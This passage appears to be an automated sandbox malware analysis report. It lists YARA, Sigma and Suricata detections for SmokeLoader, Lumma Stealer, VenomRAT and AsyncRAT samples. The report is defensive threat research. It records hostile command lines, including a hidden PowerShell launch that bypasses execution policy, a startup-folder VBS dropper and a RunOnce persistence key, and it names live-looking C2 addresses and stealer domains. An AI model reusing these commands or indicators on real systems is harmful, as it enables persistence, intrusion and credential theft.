00000014.00000003.2723578701.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2776713870.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2709425856.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2755765859.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2728281717.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2782316881.0000000000560000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000014.00000003.2721584393.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2734445019.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2709861506.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: EF14.exe PID: 3868	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 1988	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 1988	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 1988	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: vm.exe PID: 2484	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: lm.exe PID: 5724	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: lm.exe PID: 5724	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lm.exe PID: 5724	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: vm.exe PID: 2004	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Click to see the 76 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.2.vm.exe.4e40000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
19.2.vm.exe.4e40000.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xda04:$q1: Select * from Win32_CacheMemory 0xda44:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xda92:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdae0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
19.2.vm.exe.4e40000.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
19.2.vm.exe.4e40000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
26.2.vm.exe.4e30000.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
26.2.vm.exe.4e30000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
26.2.vm.exe.4e30000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
26.2.vm.exe.4e30000.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xda04:$q1: Select * from Win32_CacheMemory 0xda44:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xda92:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdae0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
9.2.EF14.exe.7ff71bc40000.6.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
9.0.EF14.exe.7ff71bc40000.0.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\8EC7.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 2580, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#5685_8yUscnjrUY

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1904, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2D42.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2D42.exe, ParentProcessId: 3664, ParentProcessName: 2D42.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 1904, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2D42.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2D42.exe, ParentProcessId: 3664, ParentProcessName: 2D42.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 1904, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , ProcessId: 6492, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2D42.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2D42.exe, ParentProcessId: 3664, ParentProcessName: 2D42.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 1904, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\8EC7.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 2580, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#5685_8yUscnjrUY

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\adjijwj, CommandLine: C:\Users\user\AppData\Roaming\adjijwj, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\adjijwj, NewProcessName: C:\Users\user\AppData\Roaming\adjijwj, OriginalFileName: C:\Users\user\AppData\Roaming\adjijwj, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\adjijwj, ProcessId: 7116, ProcessName: adjijwj

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\2D42.exe, ProcessId: 3664, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5c42fyb.j3w.ps1

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1904, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , ProcessId: 6492, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2D42.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2D42.exe, ParentProcessId: 3664, ParentProcessName: 2D42.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 1904, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1904, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:26.412471+0200
SID:	2039103
Source Port:	62237
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 154.144.253.197

Timestamp:	2024-07-27T07:46:53.007153+0200
SID:	2039103
Source Port:	62397
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:27.450483+0200
SID:	2039103
Source Port:	62238
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-07-27T07:44:33.029215+0200
SID:	2054593
Source Port:	62643
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:29.687325+0200
SID:	2054602
Source Port:	62285
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

GPL SHELLCODE x86 inc ebx NOOP - Source IP: 185.149.100.242 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T07:44:06.515038+0200
SID:	2101390
Source Port:	443
Destination Port:	62252
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:45:43.962407+0200
SID:	2039103
Source Port:	62353
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:45:34.541448+0200
SID:	2039103
Source Port:	62347
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET ADWARE_PUP Windows executable sent when remote host claims to send an image M2 - Source IP: 185.149.100.242 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T07:44:02.548569+0200
SID:	2020757
Source Port:	443
Destination Port:	62252
Protocol:	TCP
Classtype:	Possibly Unwanted Program Detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:35.163444+0200
SID:	2054653
Source Port:	62290
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:26.807342+0200
SID:	2054653
Source Port:	62280
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:55.210776+0200
SID:	2039103
Source Port:	62246
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:42.497421+0200
SID:	2054602
Source Port:	62302
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO ACTIVEX Yahoo Messenger ActiveX Control Command Execution - Source IP: 104.26.2.16 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T07:44:23.528393+0200
SID:	2800584
Source Port:	443
Destination Port:	62275
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 154.144.253.197

Timestamp:	2024-07-27T07:46:05.361378+0200
SID:	2039103
Source Port:	62366
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:33.545736+0200
SID:	2054604
Source Port:	62289
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:25.274776+0200
SID:	2054602
Source Port:	62277
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 154.144.253.197

Timestamp:	2024-07-27T07:46:33.946962+0200
SID:	2039103
Source Port:	62385
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:28.278022+0200
SID:	2054602
Source Port:	62283
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:39.170270+0200
SID:	2054602
Source Port:	62298
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:44:17.145990+0200
SID:	2039103
Source Port:	62262
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.127.169.103 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T07:43:14.381658+0200
SID:	2022930
Source Port:	443
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:55.023320+0200
SID:	2054604
Source Port:	62311
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:53.089192+0200
SID:	2039103
Source Port:	62243
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 185.149.100.242 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T07:44:02.689427+0200
SID:	2011803
Source Port:	443
Destination Port:	62252
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.4 - Destination IP: 64.190.113.113

Timestamp:	2024-07-27T07:43:56.878844+0200
SID:	2019714
Source Port:	62248
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:49.780615+0200
SID:	2054604
Source Port:	62306
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:52.008519+0200
SID:	2039103
Source Port:	62242
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:37.482189+0200
SID:	2048094
Source Port:	62295
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:44:19.266655+0200
SID:	2039103
Source Port:	62267
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:54.137677+0200
SID:	2039103
Source Port:	62244
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:40.155308+0200
SID:	2054604
Source Port:	62299
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 154.144.253.197

Timestamp:	2024-07-27T07:46:43.349202+0200
SID:	2039103
Source Port:	62391
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:24.082243+0200
SID:	2039103
Source Port:	62235
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 154.144.253.197

Timestamp:	2024-07-27T07:46:14.497349+0200
SID:	2039103
Source Port:	62372
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:28.524923+0200
SID:	2039103
Source Port:	62239
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:21.959721+0200
SID:	2039103
Source Port:	62233
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:35.291152+0200
SID:	2054602
Source Port:	62292
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:44:12.576574+0200
SID:	2039103
Source Port:	62256
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 154.144.253.197

Timestamp:	2024-07-27T07:45:56.071586+0200
SID:	2039103
Source Port:	62361
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-07-27T07:44:24.616194+0200
SID:	2054591
Source Port:	63695
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:25.719221+0200
SID:	2054653
Source Port:	62277
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:36.341460+0200
SID:	2048094
Source Port:	62292
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 31.14.70.245

Timestamp:	2024-07-27T07:44:28.497625+0200
SID:	2803274
Source Port:	62282
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:36.954814+0200
SID:	2054604
Source Port:	62295
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:58.889159+0200
SID:	2039103
Source Port:	62249
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:44:18.214510+0200
SID:	2039103
Source Port:	62265
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:44:01.039158+0200
SID:	2039103
Source Port:	62251
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:44:13.664053+0200
SID:	2039103
Source Port:	62257
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:44:20.306652+0200
SID:	2039103
Source Port:	62269
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:57.878119+0200
SID:	2054604
Source Port:	62315
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 185.149.100.242 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T07:44:02.840092+0200
SID:	2011803
Source Port:	443
Destination Port:	62252
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:25.122767+0200
SID:	2039103
Source Port:	62236
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

